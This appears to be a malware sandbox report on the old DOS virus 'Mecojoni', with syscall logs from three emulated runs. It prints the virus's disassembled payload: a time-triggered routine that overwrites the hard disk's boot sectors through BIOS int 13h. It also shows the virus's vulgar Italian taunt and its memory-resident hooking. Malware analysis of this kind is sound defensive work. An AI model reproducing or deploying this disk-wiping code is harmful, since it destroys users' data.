Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.h


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:09:27.986904531Z 74 PC: 12d1b | Reallocate memory
2018-12-17T23:09:27.989806324Z 72 PC: 12d22 | Allocate memory
2018-12-17T23:09:27.991668544Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-17T23:09:27.993902824Z 72 PC: 13262 | Allocate memory
2018-12-17T23:09:27.995552825Z 75 PC: 1329d | Execute program
2018-12-17T23:09:28.011736631Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T23:09:28.014996628Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:09:28.01648251Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:09:28.018450639Z 77 PC: 132cc | Get program return code
2018-12-17T23:09:28.01977056Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:11.737506932Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:53:11.739147754Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:53:11.740592499Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:53:11.742593009Z 72 PC: 13262 | Allocate memory
2018-12-25T12:53:11.744415377Z 75 PC: 1329d | Execute program
2018-12-25T12:53:11.758922454Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-25T12:53:11.761591286Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:53:11.780452467Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:53:11.781449382Z 77 PC: 132cc | Get program return code
2018-12-25T12:53:11.782439649Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":57,"Second":0,"TimeBased":true,"OriginalID":16535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:12.778766809Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:53:12.780540883Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:53:12.782059657Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:53:13.115370031Z 9 PC: 13489 | Display string (String= 'Ti sentivi sicuro. Avevi lo SCAN !!! Invece lo hai preso nel culo. Infatti il')
2018-12-25T12:53:13.123807489Z 9 PC: 13490 | Display string (String= 'virus MECOJONI ti ha formattato l Hard disk. MECOJONI è un virus self-modifying!')
2018-12-25T12:53:13.129118356Z 9 PC: 13497 | Display string (String= 'Sono state messe in circolazione 3000 varianti differenti di questo virus !!!!!')